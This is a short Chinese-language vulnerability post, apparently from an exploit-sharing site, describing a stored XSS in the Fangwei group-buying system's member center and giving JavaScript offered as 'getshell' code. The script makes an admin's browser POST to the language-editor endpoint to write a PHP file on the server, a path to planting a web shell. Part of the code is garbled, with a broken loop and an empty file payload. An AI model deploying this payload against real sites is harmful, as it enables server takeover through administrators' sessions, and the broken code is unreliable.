方维团购系统会员中心xss

个人中心 http://0day5.com//index.php?m=UcModify&a=index
xss
后台查看会员
xss2

附上可getshell的代码
[php]
var request = false;
if(window.XMLHttpRequest) {
request = new XMLHttpRequest();
if(request.overrideMimeType) {
request.overrideMimeType('text/xml');
}
} else if(window.ActiveXObject) {
var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
for(var i=0; i try {
request = new ActiveXObject(versions[i]);
} catch(e) {}
}
}
xmlhttp=request;

getshell();
function getshell(){

var postStr="lang=en-us&lang_file=/1.php&lang_file_content=";

xmlhttp.open("POST", "admin.php?m=Editor&a=updateLang&", true);
xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xmlhttp.setRequestHeader("Content-length", postStr.length);
xmlhttp.setRequestHeader("Connection", "close");
xmlhttp.send(postStr);
}
[/php]

发表评论